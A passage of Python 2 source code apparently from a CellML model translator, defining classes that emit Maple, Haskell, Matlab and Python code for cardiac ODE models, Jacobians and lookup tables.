self.output_comment('\nJacobian calculation\n')
if self.compute_full_jacobian:
state_vars = self.state_vars
            # Record the ordering of the state variables, since they're referred to by index below
for i, var in enumerate(state_vars):
self.writeln('print("--%d--%s--");' % (i+1, self.code_name(var)))
# Jacobian calculation for the whole ODE system, i.e. each df_i/du_j
state_var_names = map(self.code_name, state_vars)
self.writeln('jacobian', self.EQ_ASSIGN, 'array(')
self.write('[')
for var_i in state_vars:
if var_i is not state_vars[0]: self.write(',')
self.write('[')
for var_j in state_vars:
if var_j is not state_vars[0]: self.write(',')
self.write('diff(', self.code_name(var_i, ode=True), ',', self.code_name(var_j), ')')
self.write(']')
self.write(']);\n')
self.writeln('with(codegen):')
self.writeln('J', self.EQ_ASSIGN, 'optimize(jacobian);')
elif hasattr(self.model, '_cml_nonlinear_system_variables'):
# Jacobian calculation for Jon Whiteley's algorithm
vars_text = self.model._cml_nonlinear_system_variables
if type(vars_text) == type([]):
var_objs = self.model._cml_nonlinear_system_variables
else:
# Get variable objects from names
varnames = map(lambda s: s.split(','), vars_text.split(';'))
var_objs = map(lambda (c, v):
self.model.get_variable_by_name(c, v),
varnames)
# Output the Newton iteration expression for each variable
for var in var_objs:
self.writeln('g_', self.code_name(var), self.EQ_ASSIGN,
self.code_name(var), ' - ',
self.code_name(var), '_old - delta_t*',
self.code_name(var, ode=True), self.STMT_END)
# Output the derivative calculations
for var_i in var_objs:
for var_j in var_objs:
self.writeln('print("--', self.code_name(var_i), '/',
self.code_name(var_j), '--");')
self.writeln('diff(g_', self.code_name(var_i), ', ',
self.code_name(var_j), ');')
# Tell Maple to quit when done
self.writeln()
self.writeln('quit;')
return
def output_assignment(self, expr):
"""Output an assignment expression.
        If omit_constants is set and this is the assignment of a constant,
        don't output it, so that differentiation doesn't optimise expressions away.
"""
if isinstance(expr, cellml_variable):
# This may be the assignment of a mapped variable, or a constant
t = expr.get_type()
if t == VarTypes.Mapped:
self.writeln(self.TYPE_DOUBLE, self.code_name(expr),
self.EQ_ASSIGN,
self.code_name(expr.get_source_variable()),
self.STMT_END)
elif t == VarTypes.Constant and not self.omit_constants:
self.writeln(self.TYPE_CONST_DOUBLE, self.code_name(expr),
self.EQ_ASSIGN, nl=False)
self.output_number(expr.initial_value)
self.writeln(self.STMT_END, indent=False)
else:
# This is a mathematical expression
self.writeln(self.TYPE_DOUBLE, nl=False)
opers = expr.operands()
self.output_lhs(opers.next())
self.write(self.EQ_ASSIGN)
self.output_expr(opers.next(), False)
self.writeln(self.STMT_END, indent=False)
return
def output_number(self, expr):
"""Output the plain number expr.
With Maple, there is no need to make all constants parse as
doubles to avoid problems with integer division or numbers too
large for the int type.
        Negative numbers are wrapped in parentheses to avoid unwanted
        decrement operations.
"""
n = self.eval_number(expr)
num = "%.17g" % n
if num[0] == '-':
num = '(' + num + ')'
self.write(num)
def output_root(self, expr, paren):
"""Output a root taken to some degree.
        If a degree qualifier element is not provided, the default degree of 2 (square root) is used.
"""
if hasattr(expr, u'degree'):
# A degree is given. Compute x^(1/b)
self.open_paren(paren)
self.output_expr(expr.operands().next(), True)
self.write('^(1/')
self.output_expr(expr.degree, True)
self.write(')')
self.close_paren(paren)
else:
# Compute square root
self.output_function('sqrt', expr.operands(), paren)
def output_log(self, expr, paren):
"""Output a logarithm to the given base, which defaults to base 10."""
if hasattr(expr, u'logbase'):
# A base is provided. Use the log[b](x) function.
self.write('log[')
self.output_expr(expr.logbase, False)
self.write(']')
self.output_function('', expr.operands(), paren)
else:
# Use base 10
self.output_function('log10', expr.operands(), paren)
def output_piecewise(self, expr, paren):
"""Output the piecewise expression expr.
        We use Maple's piecewise function.
"""
self.write('piecewise(')
need_comma = False
for piece in getattr(expr, u'piece', []):
if need_comma:
self.write(',')
self.output_expr(child_i(piece, 2), False) # Condition
self.write(',')
self.output_expr(child_i(piece, 1), False) # Result
need_comma = True
if hasattr(expr, u'otherwise'):
if need_comma:
self.write(',')
self.output_expr(child_i(expr.otherwise, 1), paren) # Default case
self.write(')')
class CellMLToHaskellTranslator(CellMLTranslator):
"""Translate a CellML model to a Haskell version.
This does not produce a 'runnable' version of the model, but
rather an equivalent model in effectively an abstract syntax,
which can then be interpreted by a suitable interpreter.
This allows us to more easily specify an operational semantics for
CellML, without having to worry about the XML issues in the
interpreter itself.
"""
STMT_END = ''
COMMENT_START = '-- '
TYPE_DOUBLE = ''
TYPE_CONST_DOUBLE = ''
E = '(exp 1)'
PI = 'pi'
TRUE = '(Bool True)'
FALSE = '(Bool False)'
def __init__(self, **kwargs):
"""Create a Haskell translator.
Keyword arguments are all passed to the base class.
"""
super(CellMLToHaskellTranslator, self).__init__(**kwargs)
# We don't use lookup tables in Haskell code
self.use_lookup_tables = False
return
def output_file_name(self, model_filename):
"""Generate a name for our output file, based on the input file."""
return os.path.splitext(model_filename)[0] + '.hs'
def stringify(self, s):
"""Quote a string."""
return '"' + s + '"'
def code_name(self, var, ode=False, full=False):
"""
Return the full name of var in a form suitable for inclusion in a
source file.
The functionality of ode=True is implemented in output_apply
rather than here, so this parameter must be False.
If full is True, include the name of the owning component.
If PE has been performed (there is only 1 component, and variable
names have been munged) then transform the munged name to Haskell
munged form.
"""
if ode:
raise NotImplementedError # Never used; see output_apply.
if self.single_component and '__' in var.name:
name = var.name.replace('__', ',')
elif full:
name = var.xml_parent.name + ',' + var.name
else:
name = var.name
return self.stringify(name)
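    # For example, a PE-munged variable named 'membrane__V' is emitted by code_name
    # above as the Haskell string "membrane,V"; with full=True an unmunged 'V' in
    # component 'membrane' also becomes "membrane,V".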
def output_top_boilerplate(self):
"""Output top boilerplate.
Outputs the imports and model-level units definitions.
Components and connections are output by output_mathematics.
"""
self.class_name = self.class_name.lower()
self.module_name = self.class_name[0].upper() + self.class_name[1:]
self.writeln('module ', self.module_name, ' where')
self.writeln('-- Model: ', self.model.name)
self.output_comment(version_comment(self.add_timestamp))
self.writeln()
self.writeln('import CellML')
self.writeln('import Units')
self.writeln('import Environment')
self.writeln()
# Model definition
self.writeln(self.class_name, ' = Model ',
self.stringify(self.class_name),
' units components connections')
self.writeln(' where')
self.set_indent(offset=1)
# Model-level units definitions
self.writeln('units =')
self.output_units(self.model)
return
def output_unit(self, udef):
"""Output a single units definition, recursively."""
def prefix(uref):
"""Return a prefix of a units reference,
as an integer to which 10 may be raised."""
prefix = getattr(uref, u'prefix_', 0)
if prefix in uref.SI_PREFIXES:
prefix = uref.SI_PREFIXES[prefix]
else:
prefix = int(prefix)
return prefix
def num(n):
"""Wrap numbers for Haskell."""
if n < 0:
return "(" + str(n) + ")"
else:
return n
self.write('(')
if udef.is_base_unit():
# Base unit
self.write('BaseUnits ', self.stringify(udef.name))
elif udef.is_simple():
# Simple units
self.write('SimpleUnits ', num(udef.get_multiplier()), ' ',
num(prefix(udef.unit)), ' ')
self.output_unit(udef.unit.get_units_element())
self.write(' ', num(udef.get_offset()))
else:
# Complex units
self.write('ComplexUnits [')
uref_comma = False
for uref in udef.unit:
if uref_comma: self.write(',')
else: uref_comma = True
self.write('Unit ', num(uref.get_multiplier()), ' ',
num(prefix(uref)), ' ')
self.output_unit(uref.get_units_element())
self.write(' ', num(uref.get_exponent()))
self.write(']')
self.write(')')
return
def output_units(self, units_parent):
"""Output the units definitions in this model or component."""
self.open_list()
comma, output = False, False
for udef in getattr(units_parent, u'units', []):
output = True
if comma: self.writeln(',', indent=False)
else: comma = True
# Output a single definition
self.writeln('UDef ', self.stringify(udef.name), nl=False)
self.output_unit(udef)
if output:
self.writeln('', indent=False)
self.close_list()
return
def output_mathematics(self):
"""Output the mathematics in this model.
This method outputs the components and connections."""
# Components
self.writeln('components =')
self.open_list()
comma = False
for comp in getattr(self.model, u'component', []):
if comma: self.writeln(',')
else: comma = True
self.output_component(comp)
self.writeln('')
self.close_list()
# Connections
self.writeln('connections =')
self.open_list()
comma = False
for var in (v for v in self.model.get_assignments()
if isinstance(v, cellml_variable)
and v.get_type() == VarTypes.Mapped):
if comma: self.writeln(',', indent=False)
else: comma = True
self.output_connection(var)
self.writeln('', indent=False)
self.close_list()
return
def output_component(self, comp):
"""Output a single component."""
self.writeln('MkComp ', self.stringify(comp.name))
self.output_units(comp)
# Variable declarations, associating units with var names
self.open_list()
comma = False
for var in getattr(comp, u'variable', []):
if comma: self.writeln(',')
else: comma = True
self.writeln('VarDecl ', self.code_name(var), ' ',
self.stringify(var.units))
self.close_list()
# And now the mathematics
self.open_list()
comma = False
# Constants
for var in (v for v in getattr(comp, u'variable', [])
if v.get_type() == VarTypes.Constant):
if comma: self.writeln(',')
else: comma = True
self.output_assignment(var)
# Expressions
for math in getattr(comp, u'math', []):
for expr in getattr(math, u'apply', []):
if comma: self.writeln(',')
else: comma = True
self.output_assignment(expr)
self.close_list()
return
def output_connection(self, conn):
"""Output a single connection."""
to_var = conn
from_var = conn.get_source_variable()
self.writeln('VarMap', nl=False)
self.write(' (', self.stringify(from_var.xml_parent.name), ',',
self.stringify(from_var.name), ')')
self.write(' (', self.stringify(to_var.xml_parent.name), ',',
self.stringify(to_var.name), ')')
return
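# For instance, mapping variable 'x' in component 'A' (the source) onto
# variable 'y' in component 'B' is emitted as:
#   VarMap ("A","x") ("B","y")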
def output_bottom_boilerplate(self):
"""Output bottom boilerplate."""
self.set_indent(offset=-1)
self.writeln()
self.output_comment('Evaluate derivatives at the start of time.')
self.writeln()
# Initial environment
self.writeln('initial_environment :: Env')
self.writeln('initial_environment = make_env')
self.open_list()
self.writeln(' (Var ', self.code_name(self.free_vars[0], full=True),
', Val (Number 0))')
for sv in self.state_vars:
self.writeln(', (Var ', self.code_name(sv, full=True),
', Val ', nl=False)
self.output_number(sv.initial_value, as_value=True)
self.writeln(')', indent=False)
self.close_list()
self.writeln('results = run_cellml ', self.class_name,
' initial_environment')
self.writeln()
# Dynamic environment for PE
self.writeln('dynamic_environment :: Env')
self.writeln('dynamic_environment = foldr def initial_environment')
self.open_list()
# Include all variables marked as pe:keep
comma = False
for comp in getattr(self.model, u'component', []):
for var in getattr(comp, u'variable', []):
if var.pe_keep:
self.writeln([' ', ','][comma], ' (Var ',
self.code_name(var, full=True),
', Val DynamicMarker)')
if not comma: comma = True
self.close_list()
self.writeln('where def (k,v) env = define env k v', indent_offset=1)
self.writeln('pe_results = reduce_and_run_cellml ', self.class_name,
' dynamic_environment')
return
def open_list(self):
"""Open a multi-line list."""
self.set_indent(offset=1)
self.writeln('[')
self.set_indent(offset=1)
return
def close_list(self):
"""Close a multi-line list."""
self.set_indent(offset=-1)
self.writeln(']')
self.set_indent(offset=-1)
return
def output_assignment(self, expr):
"""Output an assignment expression."""
if isinstance(expr, cellml_variable):
# Assignment of a constant
self.writeln('Assign (Var ', self.code_name(expr), ') ', nl=False)
self.output_number(expr.initial_value, units=expr.units)
self.writeln(indent=False)
else:
# This is a mathematical expression
opers = expr.operands()
self.writeln('Assign ', nl=False)
self.output_lhs(opers.next())
self.write(' ')
self.output_expr(opers.next(), True)
self.writeln(indent=False)
return
def output_lhs(self, expr):
"""Output the left hand side of an assignment expression."""
if expr.localName == 'ci':
self.output_variable(expr, lhs=True)
elif expr.operator().localName == 'diff':
v1 = expr.operator().dependent_variable
v2 = expr.operator().independent_variable
self.write('(Ode ', self.code_name(v1), ' ', self.code_name(v2),
')')
return
def output_variable(self, ci_elt, lhs=False):
"""Output a ci element, i.e. a variable lookup."""
type_constructor = ['Variable', 'Var'][lhs]
self.write('(', type_constructor, ' ',
self.code_name(ci_elt.variable), ')')
return
def output_number(self, expr, as_value=False, units=None):
"""Output the plain number expr.
With Haskell there is no need to force numbers to parse as doubles.
We do need to bracket negative numbers.
"""
n = self.eval_number(expr)
num = "%.17g" % n
if num[0] == '-':
num = "(" + num + ")"
tc = ['Num', 'Number'][as_value]
if not as_value:
if units is None:
units = getattr(expr, u'units', '')
units = '(Left ' + self.stringify(units) + ')'
else:
units = ''
self.write("(", tc, " ", num, " ", units, ")")
return
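# Example (illustrative): output_number for -1.5 with units 'mV' writes
# (Num (-1.5) (Left "mV")); with as_value=True the Number constructor
# is used instead and the units annotation is omitted.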
def output_apply(self, expr, paren):
"""Output an <apply> expression.
paren is True if the context has requested parentheses.
"""
op = expr.operator()
op_name = op.localName.capitalize()
self.open_paren(paren)
# Some operators are special-cased, but most map directly
if op_name == u'Root':
self.output_special_apply(expr, u'Root', u'degree', u'Sqrt')
elif op_name == u'Log':
self.output_special_apply(expr, u'Log', u'logbase', u'Ln')
elif op_name == u'Diff':
if self.single_component:
# A bit of a hack, due to the odd way this case is
# handled by other translators - in effect the
# translator has to do some PE...
self.write('Apply Diff [Variable ',
self.code_name(
op.dependent_variable.get_source_variable(recurse=True)),
', Variable ',
self.code_name(
op.independent_variable.get_source_variable(recurse=True)),
']')
else:
self.really_output_apply(op_name, list(expr.operands()) +
[expr.bvar.ci])
else:
self.really_output_apply(op_name, expr.operands())
self.close_paren(paren)
return
def really_output_apply(self, operator, operands):
"""Actually output code for the application of an operator."""
self.write('Apply ', operator, ' [')
comma = False
for operand in operands:
if comma: self.write(',')
else: comma = True
self.output_expr(operand, False)
self.write(']')
return
def output_special_apply(self, expr, op_name, qual_name, special_name):
"""Output a special-cased apply expression.
op_name is the name of the general case operator. If the
expression has a qualifier called qual_name, this will be
used, with the qualifier's value as second operand. Otherwise,
the operator special_name will be used, with a single operand.
"""
if hasattr(expr, qual_name):
self.really_output_apply(op_name, [expr.operands().next(),
getattr(expr, qual_name)])
else:
self.really_output_apply(special_name, expr.operands())
return
def output_piecewise(self, expr, paren):
"""Output the piecewise expression expr."""
self.open_paren(paren)
self.write('Piecewise [')
comma = False
for piece in getattr(expr, u'piece', []):
if comma: self.write(',')
else: comma = True
self.write('Case ')
self.output_expr(child_i(piece, 2), True) # Condition
self.write(' ')
self.output_expr(child_i(piece, 1), True) # Result
self.write('] ')
if hasattr(expr, u'otherwise'):
self.write('(Just ')
self.output_expr(child_i(expr.otherwise, 1), True) # Default case
self.write(')')
else:
self.write('Nothing')
self.close_paren(paren)
return
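# A two-branch piecewise with an otherwise clause thus renders roughly
# as: Piecewise [Case c1 r1,Case c2 r2] (Just r3)
# with Nothing in place of (Just r3) when no otherwise is present.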
class CellMLToMatlabTranslator(CellMLTranslator):
"""Translate a CellML model to Matlab code.
The normal case generates a .m file such as could be used with ode45.
When lookup tables are used (TODO), the file generated represents a
function that returns a function handle, suitable for use with ODE
solvers.
"""
# Language tokens that differ from the default
COMMENT_START = '% ' # Start of a 1 line comment
# Types are determined automatically by Matlab
TYPE_DOUBLE = ''
TYPE_CONST_DOUBLE = ''
# Some constants are different
PI = 'pi'
E = 'exp(1)'
NOT_A_NUMBER = 'NaN'
def __init__(self, **kwargs):
super(CellMLToMatlabTranslator, self).__init__(**kwargs)
# Update some function, etc. names
self.function_map = CellMLTranslator.function_map.copy()
self.function_map.update(
{'power': 'power', 'abs': 'abs',
'xor': 'xor', 'not': '~', 'rem': 'rem',
'sec': 'sec', 'csc': 'csc', 'cot': 'cot',
'sech': 'sech', 'csch': 'csch', 'coth': 'coth',
'arcsec': 'asec', 'arccsc': 'acsc', 'arccot': 'acot',
'arcsech': 'asech', 'arccsch': 'acsch', 'arccoth': 'acoth'
})
self.recip_trig = {}
self.binary_ops = CellMLTranslator.binary_ops.copy()
del self.binary_ops['xor']
self.binary_ops['neq'] = '~='
self.binary_ops['divide'] = './'
self.nary_ops = CellMLTranslator.nary_ops.copy()
self.nary_ops['times'] = '.*'
self.special_roots = {2: 'sqrt'}
def output_file_name(self, model_filename):
"""Generate a name for our output file, based on the input file."""
name = os.path.splitext(model_filename)[0] + '.m'
# Matlab doesn't like long names :(
if len(name) > 60:
# Take end part so we get version/variant info if present
name = name[-60:]
return name
def translate(self, doc, *args, **kwargs):
"""Generate code for the model or its Jacobian matrix."""
self.variable_name_map = {}
if hasattr(doc.model, u'solver_info') and \
hasattr(doc.model.solver_info, u'jacobian'):
kwargs['continuation'] = self.output_jacobian
if 'output_filename' in kwargs and len(kwargs['output_filename'])>60:
# Take end part so we get version/variant info if present
kwargs['output_filename'] = kwargs['output_filename'][-60:]
return super(CellMLToMatlabTranslator,
self).translate(doc, *args, **kwargs)
def output_top_boilerplate(self):
"""Output top boilerplate."""
self.output_comment(version_comment(self.add_timestamp))
t = self.code_name(self.free_vars[0])
# Matlab doesn't like long names :(
if len(self.class_name) > 60:
# Take end part so we get version/variant info if present
self.class_name = self.class_name[-60:]
# Strip leading underscores
while self.class_name[0] == '_':
self.class_name = self.class_name[1:]
if self.use_lookup_tables:
self.writeln('function dy_fun_ptr = ', self.class_name, '_lt(step)')
self.output_comment('Generate a function to evaluate the model ',
self.model.name, ' using lookup tables.')
self.output_comment('The function returned is f, where dU/dt = f(t, U).')
self.writeln()
self.set_indent(offset=1)
self.output_lut_generation()
self.output_lut_lookups()
self.writeln('tables = generate_tables(step);')
else:
self.writeln('function [dy_fun_ptr initial_values V_index t_units state_var_names] = ',
self.class_name, '()')
self.output_comment('Get evaluation function and metadata for the model ',
self.model.name, '.')
self.output_comment('\nReturns the function f (where dU/dt = f(t, U)),\n'
'suitable initial values for the system,\n'
'the index of the transmembrane potential within '
'the state variable vector,\n'
'the multiplicative factor of the time units,\n'
'and the names of the state variables.')
self.set_indent(offset=1)
self.writeln('V_index = ', self.v_index+1, ';')
self.writeln('state_var_names = cell(1, ', len(self.state_vars), ');')
self.writeln('initial_values = zeros(1, ', len(self.state_vars), ');')
for i, var in enumerate(self.state_vars):
self.writeln('state_var_names{', i+1, '}', self.EQ_ASSIGN,
"'", var.fullname(), "';")
self.writeln('initial_values(', i+1, ')', self.EQ_ASSIGN,
getattr(var, u'initial_value', self.NOT_A_NUMBER), ';')
t_var = self.free_vars[0]
t_units = t_var.component.get_units_by_name(t_var.units)
self.writeln('t_units = ', t_units.get_multiplicative_factor(), ';')
self.writeln('function dy = dy_fun(',t,', y)')
self.set_indent(offset=1)
self.output_comment('Time units: ', self.free_vars[0].units)
self.writeln()
for i, var in enumerate(self.state_vars):
self.writeln(self.code_name(var), self.EQ_ASSIGN, 'y(', i+1,
');')
self.output_comment('Units: ', var.units, '; Initial value: ',
getattr(var, u'initial_value', 'Unknown'))
self.writeln()
if self.use_lookup_tables:
for key, i in self.doc.lookup_table_indexes.iteritems():
i = int(i) + 1
min, max, step, var = key
varname = self.code_name(var)
self.writeln('table_values{', i, '} = lookup_', i,
'(tables, ', varname, ', step);')
self.writeln()
return
def output_bottom_boilerplate(self):
"""Output bottom boilerplate."""
self.writeln()
self.writeln('dy = zeros(size(y));')
for i, var in enumerate(self.state_vars):
self.writeln('dy(', str(i+1), ') = ',
self.code_name(var, ode=True), ';')
self.set_indent(offset=-1)
self.writeln('end')
self.writeln()
self.writeln('dy_fun_ptr = @dy_fun;')
self.set_indent(offset=-1)
self.writeln('end')
def code_name(self, var, ode=False, shorten=True):
"""Matlab has an upper limit on the length of variable names!"""
full_name = super(CellMLToMatlabTranslator, self).code_name(var, ode)
if shorten:
full_name = self.shorten_name(full_name)
return full_name
def shorten_name(self, var_name):
"""If the name is too long for Matlab, shorten it."""
if len(var_name) > 60:
# Actual bound is 63, but let's be cautious
try:
return self.variable_name_map[var_name]
except KeyError:
new_name = 'shortened_var_' + str(len(self.variable_name_map))
self.variable_name_map[var_name] = new_name
return new_name
else:
return var_name
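# Illustrative mapping: the first over-long name encountered becomes
# 'shortened_var_0', the next 'shortened_var_1', and so on; repeated
# lookups of the same long name return the same short alias.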
def output_number(self, expr):
"""Output the plain number expr.
With Matlab, there is no need to make all constants parse as
doubles to avoid problems with integer division or numbers too
large for the int type.
Negative numbers will be prefixed by a space to avoid unwanted
decrement operations.
"""
n = self.eval_number(expr)
num = "%.17g" % n
if num[0] == '-':
num = ' ' + num
self.write(num)
def output_root(self, expr, paren):
"""Output a root taken to some degree.
If a degree qualifier element is not provided, uses default 2.
"""
if hasattr(expr, u'degree'):
# A degree is given. Compute nthroot(x, b)
x = expr.operands().next()
b = expr.degree
self.output_function('nthroot', [x, b], paren)
else:
# Compute square root
self.output_function('sqrt', expr.operands(), paren)
def output_piecewise(self, expr, paren):
"""Output the piecewise expression expr.
Uses an ifexpr.m file to code if expressions.
"""
num_ifs = 0
for piece in getattr(expr, u'piece', []):
num_ifs += 1
self.write('ifexpr(')
self.output_expr(child_i(piece, 2), False) # Condition
self.write(',')
self.output_expr(child_i(piece, 1), False) # Result
self.write(',')
if hasattr(expr, u'otherwise'):
self.output_expr(child_i(expr.otherwise, 1), paren) # Default case
else:
self.write(self.NOT_A_NUMBER) # If this is hit, things get ugly
for i in range(num_ifs):
self.close_paren(True)
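# A two-piece expression therefore renders as nested calls, e.g.
#   ifexpr(c1, r1, ifexpr(c2, r2, <otherwise or NaN>))
# (sketch only; the ifexpr.m helper must be on the Matlab path).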
def output_lut_generation(self):
"""Output code to generate lookup tables.
There should be a list of suitable expressions available as
self.doc.lookup_tables, to save having to search the whole
model.
"""
self.writeln('function tables = generate_tables(step)')
self.set_indent(offset=1)
self.output_comment('Generate all the lookup tables for this model.\n'
'Returns a cell array containing matrices, each column of '
'which contain one table.')
self.use_lookup_tables = False
for key, idx in self.doc.lookup_table_indexes.iteritems():
min, max, step, var = key
i = int(idx) + 1
table_extent = unicode(float(max) - float(min))
num_tables = unicode(self.doc.lookup_tables_num_per_index[idx])
self.writeln('tables{', i, '} = zeros(1+floor(', table_extent, '/step),',
num_tables, ');')
for expr in self.doc.lookup_tables:
j = int(expr.table_name) + 1
i = int(expr.table_index) + 1
var = expr.get_component().get_variable_by_name(expr.var)
varname = self.code_name(var)
self.writeln(varname, ' = [', expr.min, ':step:', expr.max, '];')
self.writeln('tables{', i, '}(:,', j, ') = ', nl=False)
self.output_expr(expr, False)
self.writeln(';', indent=False)
self.use_lookup_tables = True
self.set_indent(offset=-1)
self.writeln('end')
self.writeln()
def output_lut_lookups(self):
"""Output the functions that perform table lookups."""
for key, idx in self.doc.lookup_table_indexes.iteritems():
i = int(idx) + 1
min, max, step, var = key
self.writeln('function val = lookup_', i, '(tables, var, step)')
self.set_indent(offset=1)
self.output_comment('Lookup all tables for variable var')
self.writeln('if ~isreal(var)')
self.writeln("error(['Index variable value ' num2str(var) ' is not real'])",
indent_offset=1)
self.writeln('end')
self.writeln('table_lower = ', min, ';')
self.writeln('table_upper = ', max, ';')
self.writeln('if var < table_lower || var >= table_upper')
self.writeln("error(['Index variable value ' num2str(var) ' outside table bounds'])",
indent_offset=1)
self.writeln('end')
self.writeln('i = 1 + floor((var - table_lower)/step);')
self.writeln('y1 = tables{', i, '}(i, :);')
self.writeln('y2 = tables{', i, '}(i+1, :);')
self.writeln('var_i = table_lower + step*(i-1);')
self.writeln('val = y1 + (y2-y1) .* (var-var_i) ./ step;')
self.set_indent(offset=-1)
self.writeln('end')
self.writeln()
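# The generated lookup performs standard linear interpolation between
# adjacent table rows: with var_i the table abscissa just below var,
#   val = y1 + (y2 - y1) .* (var - var_i) ./ step
# as emitted above.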
def output_table_lookup(self, expr, paren):
"""Output code to look up expr in the appropriate table."""
i = int(expr.table_index) + 1
j = int(expr.table_name) + 1
self.write('table_values{', i, '}(', j, ')')
def output_jacobian(self):
"""Generate code to compute the Jacobian matrix for this model."""
t = self.code_name(self.free_vars[0])
self.writeln('function J = jacobian(',t,', y)')
self.set_indent(offset=1)
self.output_comment('Jacobian matrix for the model ', self.model.name)
self.output_comment('Evaluates the matrix J, where J(j,i) = d f_i / d u_j')
# State variable assignments
for i, var in enumerate(self.state_vars):
self.writeln(self.code_name(var), self.EQ_ASSIGN, 'y(', str(i+1),
');')
self.output_comment('Units: ', var.units, '; Initial value: ',
getattr(var, u'initial_value', 'Unknown'))
# Mathematics that the Jacobian depends on
used_vars = set()
for entry in self.model.solver_info.jacobian.entry:
used_vars.update(self._vars_in(entry.math))
nodeset = self.calculate_extended_dependencies(used_vars)
self.output_equations(nodeset)
self.writeln()
# Jacobian entries
state_var_names = map(lambda v: self.code_name(v, shorten=False),
self.state_vars)
self.writeln('J = zeros(length(y));')
for entry in self.model.solver_info.jacobian.entry:
var_i, var_j = entry.var_i, entry.var_j
i = state_var_names.index(var_i) + 1
j = state_var_names.index(var_j) + 1
self.writeln('J(', j, ',', i, ') = ', nl=False)
entry_content = list(entry.math.xml_element_children())
assert len(entry_content) == 1
self.output_expr(entry_content[0], False)
self.writeln(self.STMT_END, indent=False)
self.set_indent(offset=-1)
self.writeln('end')
def output_variable(self, ci_elt, ode=False):
"""Output a ci element, i.e. a variable lookup."""
if hasattr(ci_elt, '_cml_variable') and ci_elt._cml_variable:
self.write(self.code_name(ci_elt.variable, ode=ode))
else:
# This ci element is in the solver_info section, thus
# doesn't have all the extra annotations. It is a fully
# qualified name though.
prefix = ['var_', 'd_dt_'][ode]
varname = unicode(ci_elt)
if varname[0] == '(':
# (compname,varname)
cname, vname = varname[1:-1].split(u',')
if self.single_component:
varname = vname
else:
varname = cname + '__' + vname
elif varname == u'delta_t':
# Special case for the timestep in ComputeJacobian
prefix = ''
varname = 'mDt'
else:
# var_cname__vname
varname = varname[4:]
self.write(self.shorten_name(prefix + varname))
return
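# Illustrative example: a solver_info name '(membrane,V)' becomes
# 'var_membrane__V' in a multi-component model, or 'var_V' after PE to
# a single component, before being passed through shorten_name.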
class CellMLToPythonTranslator(CellMLToChasteTranslator):
"""Output code suitable for the Python implementation of Functional Curation."""
STMT_END = ''
COMMENT_START = '# '
DOXYGEN_COMMENT_START = '## '
TYPE_DOUBLE = ''
TYPE_CONST_DOUBLE = ''
TYPE_VOID = ''
TYPE_CONST_UNSIGNED = ''
TYPE_VECTOR = ''
TYPE_VECTOR_REF = ''
TRUE = 'True'
FALSE = 'False'
M_PI = 'math.pi'
M_E = 'math.e'
NOT_A_NUMBER = 'float("nan")'
USES_SUBSIDIARY_FILE = False
binary_ops = CellMLToChasteTranslator.binary_ops.copy()
binary_ops.update({'rem': '%'})
nary_ops = CellMLToChasteTranslator.nary_ops.copy()
nary_ops.update({'and': 'and', 'or': 'or'})
function_map = {'power': 'math.pow', 'abs': 'abs', 'ln': 'math.log', 'log': 'math.log', 'exp': 'math.exp',
'floor': 'math.floor', 'ceiling': 'math.ceil',
'factorial': 'factorial', # Needs external definition
'not': 'not',
'sin': 'math.sin', 'cos': 'math.cos', 'tan': 'math.tan',
'sec': '1/math.cos', 'csc': '1/math.sin', 'cot': '1/math.tan',
'sinh': 'math.sinh', 'cosh': 'math.cosh', 'tanh': 'math.tanh',
'sech': '1/math.cosh', 'csch': '1/math.sinh', 'coth': '1/math.tanh',
'arcsin': 'math.asin', 'arccos': 'math.acos', 'arctan': 'math.atan',
'arcsinh': 'math.asinh', 'arccosh': 'math.acosh', 'arctanh': 'math.atanh'}
special_roots = {2: 'math.sqrt'}
def output_file_name(self, model_filename):
"""Generate a name for our output file, based on the input file."""
return os.path.splitext(model_filename)[0] + '.py'
def open_block(self, **kwargs):
"""Just increase indent; we assume the previous line included a colon."""
self.set_indent(offset=1)
def close_block(self, blank_line=True, **kwargs):
"""Decrease indent, and optionally add an extra blank line."""
self.set_indent(offset=-1)
if blank_line:
self.writeln(**kwargs)
return
def code_name(self, var, *args, **kwargs):
"""Return the full name of var in a form suitable for inclusion in a source file.
Overrides the base class version to access self.parameters for parameters.
"""
if hasattr(var, '_cml_param_index'):
return self.vector_index(self.param_vector_name, var._cml_param_index)
else:
return super(CellMLToPythonTranslator, self).code_name(var, *args, **kwargs)
def output_log(self, expr, paren):
"""Output a logarithm to the given base, which defaults to base 10."""
if hasattr(expr, u'logbase'):
# A base is provided.
self.output_function('math.log', list(expr.operands()) + [expr.logbase], paren)
else:
# Use base 10
self.output_function('math.log10', expr.operands(), paren)
def output_root(self, expr, paren):
"""Output a root taken to some degree.
If a degree qualifier element is not provided, uses default 2.
"""
if hasattr(expr, u'degree'):
# A degree is given. Compute x^(1/b)
self.write('math.pow(')
self.output_expr(expr.operands().next(), False)
self.write(', 1/')
self.output_expr(expr.degree, True)
self.write(')')
else:
# Compute square root
self.output_function('math.sqrt', expr.operands(), paren)
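# Example generated code (sketch): a root of degree d of x becomes
# math.pow(x, 1/d), while a plain square root becomes math.sqrt(x).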
def output_piecewise(self, expr, paren):
"""Output the piecewise expression expr.
We use a cascading ternary if expression for simplicity.
"""
self.open_paren(paren)
for piece in getattr(expr, u'piece', []):
self.output_expr(child_i(piece, 1), True) # Result
self.write(' if ')
self.output_expr(child_i(piece, 2), True) # Condition
self.write(' else ')
if hasattr(expr, u'otherwise'):
self.output_expr(child_i(expr.otherwise, 1), True) # Default case
else:
self.write(self.NOT_A_NUMBER)
self.close_paren(paren)
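# A piecewise with two cases thus becomes a cascading conditional
# expression, e.g. (r1 if c1 else r2 if c2 else <otherwise or nan>),
# relying on Python's right-associative chaining of ternaries.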
def vector_create(self, vector, size):
"""Return code for creating a new vector with the given size."""
return ''.join(map(str, [vector, self.EQ_ASSIGN, 'np.zeros(', size, ')', self.STMT_END]))
def vector_initialise(self, vector, size):
"""Return code for creating an already-declared vector with the given size."""
return self.vector_create(vector, size)
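# For example, vector_create('self.state', 3) returns the statement
# 'self.state = np.zeros(3)' (assuming the inherited EQ_ASSIGN of ' = '
# and this class's empty STMT_END).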
def analyse_model(self):
"""Figure out protocol inputs & outputs of interest, and record details as member variables."""
assert self.use_protocol
# Single-valued outputs
self._outputs = cellml_metadata.find_variables(self.model,
('pycml:output-variable', NSS['pycml']),
'yes')
self._outputs.sort(key=lambda v: self.var_display_name(v))
# Vector-valued outputs
self._vector_outputs = {}
prop = ('pycml:output-vector', NSS['pycml'])
vector_names = set(cellml_metadata.get_targets(self.model, None,
cellml_metadata.create_rdf_node(prop)))
for name in vector_names:
vector_outputs = cellml_metadata.find_variables(self.model, prop, name)
assert len(vector_outputs) > 0
